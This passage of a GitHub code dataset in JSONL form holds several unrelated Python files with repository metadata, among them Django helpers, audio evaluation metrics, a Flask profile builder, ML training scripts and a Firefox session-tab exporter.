tuple[tuple] or models.Choices) -> dict:\n \"\"\"\n 将choices的逆序转换为字典\n \"\"\"\n if isinstance(choices, tuple):\n return {v: k for k, v in choices}\n elif isinstance(choices, models.Choices):\n return {v: k for k, v in choices.choices}\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef get_choices_key(choices: tuple[tuple] or models.Choices, choice_value: str, strict: bool = False) -> str or int:\n \"\"\"\n :param choices:\n :param choice_value:\n :param strict:模糊匹配或者严格匹配\n :return:\n \"\"\"\n choices_dict = reverse_choices_to_dict(choices)\n if strict:\n return choices_dict.get(choice_value, None)\n for v, k in 
choices_dict.items():\n if choice_value in v:\n return k\n return None\n\n\ndef choices_to_list(choices: tuple[tuple] or models.Choices, mode: str = 'val') -> list:\n return list(choices_to_dict(choices).values()) if mode == 'val' else list(choices_to_dict(choices).keys())\n\n\ndef list_to_choices(choices: list) -> tuple[tuple[Any, Any], ...]:\n return tuple((v, v) for v in choices)\n\n\ndef same_choices(choices: tuple[tuple] or models.Choices, mode: str = 'val') -> tuple[tuple[Any, Any], ...]:\n return list_to_choices(choices_to_list(choices, mode))\n", "repo_name": "diklios5768/BaseDjangoSystem", "sub_path": "System/Common/viewModels/choices.py", "file_name": "choices.py", "file_ext": "py", "file_size_in_byte": 2548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Choices", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "26808826431", "text": "\n'''\nPart of the code modified from\nhttps://github.com/andabi/music-source-separation\n'''\n\nimport numpy as np\nfrom mir_eval.separation import bss_eval_sources\n\ndef calc_sdr(w_real, w_pred):\n n_real, = w_real.shape\n n_pred, = w_pred.shape\n n = min(n_real, n_pred)\n \n w_real, w_pred = w_real[:n], w_pred[:n]\n\n sdr, _, _, _ = bss_eval_sources(w_real, w_pred, compute_permutation=True)\n return sdr\n\ndef bss_eval(mixed_wav, src1_wav, src2_wav, pred_src1_wav, pred_src2_wav):\n len = pred_src1_wav.shape[0]\n src1_wav = src1_wav[:len]\n src2_wav = src2_wav[:len]\n mixed_wav = mixed_wav[:len]\n sdr, sir, sar, _ = bss_eval_sources(np.array([src1_wav, src2_wav]),\n np.array([pred_src1_wav, pred_src2_wav]), compute_permutation=True)\n sdr_mixed, _, _, _ = bss_eval_sources(np.array([src1_wav, src2_wav]),\n np.array([mixed_wav, mixed_wav]), compute_permutation=True)\n nsdr = sdr - sdr_mixed\n 
return nsdr, sir, sar, len\n\ndef bss_eval_sdr(src1_wav, pred_src1_wav):\n len_cropped = pred_src1_wav.shape[0]\n src1_wav = src1_wav[:len_cropped]\n\n sdr, _, _, _ = bss_eval_sources(src1_wav,\n pred_src1_wav, compute_permutation=True)\n return sdr\n", "repo_name": "tuxzz/emrpcnn_pub", "sub_path": "cli/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 17, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "39523194909", "text": "import datetime, logging\nfrom collections import defaultdict\nfrom operator import itemgetter\n\nfrom flask import render_template, Markup\n\nfrom fbvoting.apis.fb import get_user_id\nfrom fbvoting.db.directvote import has_direct_or_delegate_vote\nfrom fbvoting.db.delegatevote import delegation_category_and_date_generator\nfrom fbvoting.db.users import get_rank_and_percentiles\nfrom fbvoting.db.categories import categories\nfrom fbvoting.conf import DOMAIN\nimport commons\n\nlogger = logging.getLogger(__name__)\n\ndef build_profile():\n \n userid = get_user_id()\n \n count_genre, count_time = get_stat_counters(userid)\n total_nominations = sum(count_genre.values())\n dates, date_values, timeplot_options = prepare_time_plot(count_time)\n \n data = commons.get_base_data()\n data.update({\n 'active_section': 'profile',\n 'brief_comment': get_plural_and_brief_comment(total_nominations),\n 'total_nominations': total_nominations,\n 'nonzero': total_nominations > 0\n })\n \n if total_nominations > 0:\n best_category = max(count_genre.items(), key=itemgetter(1))[0]\n data.update({\n 'share_message': get_share_message(total_nominations, best_category),\n 'picture': '%s/static/images/categories/%s.jpg' % (DOMAIN, best_category),\n 'dates': dates,\n 'date_values': date_values,\n 'categories': categories(),\n 'category_values': [count_genre.get(c, 0) for c in categories()],\n 'timeplot_options': timeplot_options,\n 'categories_with_requests': categories_with_requests(userid, count_genre)\n })\n \n data.update(get_ranking_infos(userid))\n \n else:\n data.update({\n 'picture': DOMAIN + '/static/images/liquid-fm-icon-medium.png',\n 'share_message': \"\"\"\n Do you trust my taste in music, or you'd like to share yours?\n Do it with Liquid FM!\n \"\"\"\n })\n \n return render_template('profile.html', **data)\n\n\n_fmt = lambda x : (\"%.0f\" % x) if x > 1 else str(x) \n\ndef get_ranking_infos(user):\n stats = get_rank_and_percentiles(user)\n \n infos = sorted( [\n (cat, scores['perc'])\n for (cat, scores) in stats.items()\n if scores['perc'] < 51\n ], key = itemgetter(1))\n \n if not infos:\n return {}\n else:\n results = {}\n \n best_genre, best_perc = infos[0]\n guru_status = best_perc < 10\n \n title = (best_genre + \" \" +\n (\"guru\" if guru_status else \"expert\") + \"!\"\n )\n \n share_msg = (\n title + ' I am in the top ' 
+ _fmt(best_perc) + '% of all ' +\n 'Liquid FM users when it comes to ' + best_genre + ' music!'\n )\n \n details = (\n \"

    According to our ranking system, \" +\n \"you're in the top \" + _fmt(best_perc) + \"% of all Liquid FM \"+\n \"users when it comes to \" + best_genre + \" music! \" +\n \"That means your \" +\n best_genre + \" votes are \" +\n (\"very \" if guru_status else \"\") + \"important to the community.

    \"\n )\n \n if len(infos) > 1:\n details += \"

    Also, you're\"\n other_genres = [ (\"in the top \" + _fmt(p) + \"% for \" + c + \"\") for (c, p) in infos[1:]]\n \n if len(other_genres) == 1:\n details += \" \" + other_genres[0] + \".\"\n else:\n details += \":

    • \" + \"
    • \".join(other_genres) + \"
    \"\n \n details += \"

    \"\n \n \n results['ranking_infos'] = Markup(\"\"\"\n
    \n \"\"\n

    %s

    \n %s\n \"\"\" % (best_genre, title, details) )\n \n results['picture_guru'] = DOMAIN + ('/static/images/categories/%s.jpg' % best_genre)\n results['share_guru'] = share_msg\n \n return results\n\n\n\ndef get_plural_and_brief_comment(n):\n if n == 0:\n return \"s, yet!\"\n if n == 1:\n return \" from a friend!\"\n return \"s from your friends!\"\n\ndef categories_with_requests(user, stats_genre):\n assert type(user) in (int, long)\n \n return [\n genre for genre, nominations in stats_genre.items()\n if nominations > 0\n and not has_direct_or_delegate_vote(user, genre)\n ]\n \n\n\ndef get_share_message(tot, best_category):\n times = (\"%i times \" % tot) if tot > 1 else \"\"\n return (\"I've been nominated %son Liquid FM, and\\\n I've discovered that my friends trust my taste in %s music!\"\n % (times, best_category) )\n\n\ndef get_stat_counters(userid):\n count_genre = defaultdict(int)\n count_time = defaultdict(int)\n \n for category, date in delegation_category_and_date_generator(userid):\n count_genre[category] += 1\n week = date.timetuple().tm_yday / 7\n count_time[date.year, week] += 1\n \n return count_genre, count_time\n\ndef get_current_year_week():\n now = datetime.datetime.now().timetuple()\n return now.tm_year, now.tm_yday / 7\n\n\ndef prepare_time_plot(count_time):\n if len(count_time) == 0:\n return [datetime.datetime.now().strftime(\"%d %B %Y\")], [0], {}\n \n labels = []\n data = []\n \n today = datetime.date.today()\n \n def get_label(year, week):\n date = datetime.date(year, 1, 1) + datetime.timedelta(7 * (week +1))\n if date > today: # it does not make sense to show future dates\n date = today\n return date.strftime(\"%d %B %Y\")\n \n \n year, week = min(count_time.keys())\n labels.append(get_label(year, week - 1))\n data.append(0)\n \n total_value = 0\n for ((year, week), value) in sorted(count_time.items()):\n labels.append(get_label(year, week))\n total_value += value\n data.append(total_value)\n \n current_year, current_week = get_current_year_week()\n while year < current_year or week < (current_week-1):\n week += 1\n if week == 52:\n week = 0\n year += 1\n \n labels.append(get_label(year, week))\n data.append(total_value)\n \n \n if len(data) < 10:\n options = {\n 'scaleOverride' : True,\n 'scaleSteps' : max(data),\n 'scaleStepWidth' : 1,\n 'scaleStartValue' : 0,\n }\n else:\n options = {}\n \n return labels, data, options\n \n\n\n", "repo_name": "corradomonti/fbvoting", "sub_path": "fbvoting/pagebuilders/buildprofile.py", "file_name": "buildprofile.py", "file_ext": "py", "file_size_in_byte": 6604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "fbvoting.apis.fb.get_user_id", "line_number": 19, "usage_type": "call"}, {"api_name": "commons.get_base_data", "line_number": 25, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 34, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 37, "usage_type": "name"}, {"api_name": "fbvoting.db.categories.categories", "line_number": 40, "usage_type": "call"}, {"api_name": "fbvoting.db.categories.categories", "line_number": 41, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}, {"api_name": "fbvoting.db.users.get_rank_and_percentiles", "line_number": 63, "usage_type": "call"}, {"api_name": 
"operator.itemgetter", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.Markup", "line_number": 109, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 116, "usage_type": "name"}, {"api_name": "fbvoting.db.directvote.has_direct_or_delegate_vote", "line_number": 136, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 149, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 150, "usage_type": "call"}, {"api_name": "fbvoting.db.delegatevote.delegation_category_and_date_generator", "line_number": 152, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 166, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 166, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 171, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 174, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "75336250723", "text": "# video_read_plugin=\"load-avi-mp4-mov\"\n# video_read_plugin_kwargs={}\n\nimport pims\n\ndef video_read(avi_path, start_frame, stop_frame, **kw):\n data = pims.open(avi_path)\n\n if not start_frame: start_frame=0\n if not stop_frame: stop_frame=len(data)+1\n\n start_frame_clamped = max(0, start_frame)\n stop_frame_clamped = min(len(data)+1, stop_frame)\n\n data_sliced = data[start_frame_clamped:stop_frame_clamped]\n data_sliced.shape = [len(data_sliced), *data_sliced[0].shape]\n\n # data is indexed as data[iframe][iheight,iwidth,ichannel]\n\n return data.frame_rate, data_sliced\n", "repo_name": "JaneliaSciComp/SongExplorer", "sub_path": "src/load-avi-mp4-mov.py", "file_name": "load-avi-mp4-mov.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pims.open", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "139569158", "text": "from argparse import ArgumentParser\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer \nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.utilities.model_summary import ModelSummary\n\nfrom latent_actions import cvae\nfrom latent_actions.data.dataset import EpisodicDataset, DemonstrationDataset\n\n\nparser = ArgumentParser()\nparser.add_argument(\n \"--model_class\", default=\"cVAE\", type=str, \n choices=cvae.DECODER_CLASS.keys())\nparser.add_argument(\"--batch_size\", type=int, default=32)\n# NOTE: Trainer.add_argparse_args(parser) kind of pollutes the \n# hyperparameter space.\nparser.add_argument(\"--max_epochs\", type=int, default=400)\nparser.add_argument(\"--no_wandb\", action=\"store_true\")\nparser.add_argument(\"--data_path\", type=str, required=True)\nargs, _ = parser.parse_known_args()\n\nepisodic_dataset = EpisodicDataset.load(args.data_path)\nparser = DemonstrationDataset.add_dataset_specific_args(parser, episodic_dataset)\nargs, _ = parser.parse_known_args()\ndataset = DemonstrationDataset(episodic_dataset, **vars(args))\n\nModelClass = cvae.DECODER_CLASS[args.model_class]\nparser = ModelClass.add_model_specific_args(parser)\nargs = parser.parse_args()\n\ntrain_set, test_set = 
torch.utils.data.random_split(\n dataset, [int(len(dataset) * .8), len(dataset) - int(len(dataset) * .8)])\ntrain_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True)\ntest_loader = DataLoader(test_set, batch_size=args.batch_size, shuffle=True)\n\nmodel = ModelClass(\n context_dim=dataset.get_context_dim(), \n action_dim=dataset.get_action_dim(), \n **vars(args))\nmodel.set_kl_scheduler(n_steps=args.max_epochs*len(train_loader)) \n\nif not args.no_wandb:\n wandb_logger = WandbLogger(\n project=\"latent-action\", entity=\"ucla-ncel-robotics\")\n trainer = Trainer(\n logger=wandb_logger, \n auto_select_gpus=True,\n max_epochs=args.max_epochs)\nelse:\n trainer = Trainer(\n auto_select_gpus=True,\n max_epochs=args.max_epochs)\n\nprint(model)\nmodel_summary = ModelSummary(model)\n\nif not args.no_wandb:\n wandb_logger.log_hyperparams({\n \"total_parameters\": model_summary.total_parameters,\n \"trainable_parameters\": model_summary.trainable_parameters,\n \"dataset_size\": len(dataset)})\n\ntrainer.fit(model, train_loader, test_loader)\n", "repo_name": "louixp/latent-actions", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS.keys", "line_number": 16, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS", "line_number": 16, "usage_type": "attribute"}, {"api_name": "latent_actions.cvae", "line_number": 16, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.EpisodicDataset.load", "line_number": 25, "usage_type": "call"}, {"api_name": "latent_actions.data.dataset.EpisodicDataset", "line_number": 25, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset.add_dataset_specific_args", "line_number": 26, "usage_type": "call"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset", "line_number": 26, "usage_type": "name"}, {"api_name": "latent_actions.data.dataset.DemonstrationDataset", "line_number": 28, "usage_type": "call"}, {"api_name": "latent_actions.cvae.DECODER_CLASS", "line_number": 30, "usage_type": "attribute"}, {"api_name": "latent_actions.cvae", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 37, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 48, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 53, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.model_summary.ModelSummary", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "11028000520", "text": "import networkx as nx\nimport numpy as np\n\ndef bfs_seq(G, start_id):\n '''\n get a bfs node sequence\n :param G:\n :param start_id:\n :return:\n '''\n dictionary = dict(nx.bfs_successors(G, start_id))\n start = [start_id]\n output = [start_id]\n while len(start) > 0:\n next = []\n while len(start) > 0:\n current = start.pop(0)\n neighbor = dictionary.get(current)\n if neighbor is not None:\n 
#### a wrong example, should not permute here!\n # shuffle(neighbor)\n next = next + neighbor\n output = output + next\n start = next\n return output\n\n\n\ndef encode_adj(adj, max_prev_node=10, is_full = False):\n '''\n\n :param adj: n*n, rows means time step, while columns are input dimension\n :param max_degree: we want to keep row number, but truncate column numbers\n :return: n*M(max_prev_node)\n '''\n if is_full:\n max_prev_node = adj.shape[0]-1\n\n # pick up lower tri\n adj = np.tril(adj, k=-1)\n n = adj.shape[0]\n adj = adj[1:n, 0:n-1]\n\n # use max_prev_node to truncate\n # note: now adj is a (n-1)*(n-1) matrix\n adj_output = np.zeros((adj.shape[0], max_prev_node))\n for i in range(adj.shape[0]):\n input_start = max(0, i - max_prev_node + 1)\n input_end = i + 1\n output_start = max_prev_node + input_start - input_end\n output_end = max_prev_node\n adj_output[i, output_start:output_end] = adj[i, input_start:input_end]\n adj_output[i,:] = adj_output[i,:][::-1] # reverse order\n\n return adj_output\n\ndef decode_adj(adj_output):\n '''\n recover to adj from adj_output\n note: here adj_output have shape (n-1)*m\n '''\n max_prev_node = adj_output.shape[1]\n adj = np.zeros((adj_output.shape[0], adj_output.shape[0]))\n for i in range(adj_output.shape[0]):\n input_start = max(0, i - max_prev_node + 1)\n input_end = i + 1\n output_start = max_prev_node + max(0, i - max_prev_node + 1) - (i + 1)\n output_end = max_prev_node\n adj[i, input_start:input_end] = adj_output[i,::-1][output_start:output_end] # reverse order\n adj_full = np.zeros((adj_output.shape[0]+1, adj_output.shape[0]+1))\n n = adj_full.shape[0]\n adj_full[1:n, 0:n-1] = np.tril(adj, 0)\n adj_full = adj_full + adj_full.T\n\n return adj_full\n\n\ndef encode_adj_flexible(adj):\n '''\n return a flexible length of output\n note that here there is no loss when encoding/decoding an adj matrix\n :param adj: adj matrix\n :return: not a matrix, but a list of adj vectors.\n '''\n # pick up lower tri\n adj = np.tril(adj, k=-1)\n n = adj.shape[0]\n adj = adj[1:n, 0:n-1]\n\n adj_output = []\n input_start = 0\n for i in range(adj.shape[0]):\n input_end = i + 1\n adj_slice = adj[i, input_start:input_end]\n adj_output.append(adj_slice)\n non_zero = np.nonzero(adj_slice)[0]\n input_start = input_end-len(adj_slice)+np.amin(non_zero)\n\n return adj_output\n\n\ndef decode_adj_flexible(adj_output):\n '''\n return a flexible length of output\n note that here there is no loss when encoding/decoding an adj matrix\n :param adj: adj matrix\n :return:\n '''\n adj = np.zeros((len(adj_output), len(adj_output)))\n for i in range(len(adj_output)):\n output_start = i+1-len(adj_output[i])\n output_end = i+1\n adj[i, output_start:output_end] = adj_output[i]\n adj_full = np.zeros((len(adj_output)+1, len(adj_output)+1))\n n = adj_full.shape[0]\n adj_full[1:n, 0:n-1] = np.tril(adj, 0)\n adj_full = adj_full + adj_full.T\n\n return adj_full", "repo_name": "johnding1996/UMD-CMSC726-Project", "sub_path": "utils/graph_ops.py", "file_name": "graph_ops.py", "file_ext": "py", "file_size_in_byte": 3641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.bfs_successors", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, 
{"api_name": "numpy.tril", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.tril", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "28037414080", "text": "import datetime\nimport logging\nimport os\n\nfrom django.core.management.base import BaseCommand\nfrom main.models import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Deletes any states marked for deletion with null project, type, or version.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--min_age_days\",\n type=int,\n default=int(os.getenv(\"EXPIRATION_AGE_DAYS\", 30)),\n help=\"Minimum age in days of state objects for deletion.\",\n )\n\n def handle(self, **options):\n BATCH_SIZE = 1000\n num_deleted = 0\n min_delta = datetime.timedelta(days=options[\"min_age_days\"])\n max_datetime = datetime.datetime.now(datetime.timezone.utc) - min_delta\n while True:\n # We cannot delete with a LIMIT query, so make a separate query\n # using IDs.\n deleted = State.objects.filter(deleted=True, modified_datetime__lte=max_datetime)\n null_project = State.objects.filter(\n project__isnull=True, modified_datetime__lte=max_datetime\n )\n null_type = State.objects.filter(type__isnull=True, modified_datetime__lte=max_datetime)\n null_version = State.objects.filter(\n version__isnull=True, modified_datetime__lte=max_datetime\n )\n null_media = State.objects.filter(\n media__isnull=True, modified_datetime__lte=max_datetime\n )\n state_ids = (\n (deleted | null_project | null_type | null_version | null_media)\n .distinct()\n .values_list(\"pk\", flat=True)[:BATCH_SIZE]\n )\n states = State.objects.filter(pk__in=state_ids)\n num_states = states.count()\n if num_states == 0:\n break\n states.delete()\n num_deleted += num_states\n logger.info(f\"Deleted a total of {num_deleted} states...\")\n logger.info(f\"Deleted a total of {num_deleted} states!\")\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/management/commands/prunestates.py", "file_name": "prunestates.py", "file_ext": "py", "file_size_in_byte": 2064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 11, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 26, "usage_type": "attribute"}, {"api_name": "main.models.State.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 30, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": 
"main.models.State", "line_number": 31, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 34, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 35, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 38, "usage_type": "name"}, {"api_name": "main.models.State.objects.filter", "line_number": 46, "usage_type": "call"}, {"api_name": "main.models.State.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "main.models.State", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "23300996403", "text": "import os\nimport sys\nimport json\ntry:\n from html import escape # py3\nexcept ImportError:\n from cgi import escape # py2\n\ndef usage():\n print(\"USAGE: firefox_recovery_to_html.py /path/to/profile_dir/sessionstore-backups/recovery.js\")\n\nif len(sys.argv) < 1:\n usage()\n raise SystemExit(1)\n\nfpath = sys.argv[1]\n\nif fpath == '--help' or fpath == '-h':\n usage()\n raise SystemExit()\n\nif not os.path.exists(fpath):\n raise SystemExit(\"ERROR: file does not exist: %s\" % fpath)\n\nwith open(fpath, 'r') as fh:\n raw = fh.read()\n\njs = json.loads(raw)\n\n\"\"\"\n_closedWindows\nwindows\nsession\nselectedWindow\nglobal\n\"\"\"\n\nprint('')\nprint('recovery.js tabs')\nprint('
>')\nfor i in js['windows']:\n    for x in i['tabs']:\n        tab = x['entries'][-1]\n        print('<li>{title}</li><li><a href=\"{url}\">{url}</a></li>'.format(title=tab['title'], url=escape(tab['url'])))\nprint('</ul></body></html>
    ')\n", "repo_name": "jantman/misc-scripts", "sub_path": "firefox_recovery_to_html.py", "file_name": "firefox_recovery_to_html.py", "file_ext": "py", "file_size_in_byte": 1157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 133, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "5081080505", "text": "import numpy as np\nimport tensorflow as tf\nimport autokeras as ak\n\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\n\ndatasets = load_breast_cancer()\nx = datasets.data\ny = datasets.target\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=66, shuffle=True)\n\nprint(x_train.shape, x_test. shape) \nprint(y_train.shape, y_test.shape) \n\nscale = MinMaxScaler()\nscale.fit(x_train)\nx_train = scale.transform(x_train)\nx_test = scale.transform(x_test)\n\n\n#ImageRegressor는 shape가 맞지않음\nmodel = ak.StructuredDataClassifier(\n overwrite=True,\n max_trials=2,\n #loss='mse',\n #metrics=['acc']\n)\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n\nes= EarlyStopping(monitor='val_loss',mode='min', patience=6)\nlr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=2)\nck = ModelCheckpoint('C:/data/modelcheckpoint/', save_best_only=True, save_weights_only=True, monitor='val_loss', verbose=1)\n\n\nmodel.fit(x_train, y_train, epochs=10, validation_split=0.2, callbacks=[es, lr, ck])\n\nresults = model.evaluate(x_test, y_test)\nprint(results) \n\nmodel2 = model.export_model()\ntry:\n model2.save('C:/data/save/cancer', save_format='tf')\nexcept:\n model2.save('C:/data/save/cancer.h5')\n\n# 4/4 [==============================] - 0s 4ms/step - loss: 0.0745 - accuracy: 0.9737\n# [0.07452034205198288, 0.9736841917037964]", "repo_name": "jsja22/study", "sub_path": "keras3/keras108_cancer.py", "file_name": "keras108_cancer.py", "file_ext": "py", "file_size_in_byte": 1563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_breast_cancer", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "autokeras.StructuredDataClassifier", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.EarlyStopping", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "73773987046", "text": "# Author - Puneet\r\n# Downloading dataset, creating directories, extracting and deleting\r\nimport requests\r\nfrom zipfile import ZipFile \r\nimport os\r\n\r\ntemp_Directory = \"/tmp/data/\"\r\nparent_Directory = 
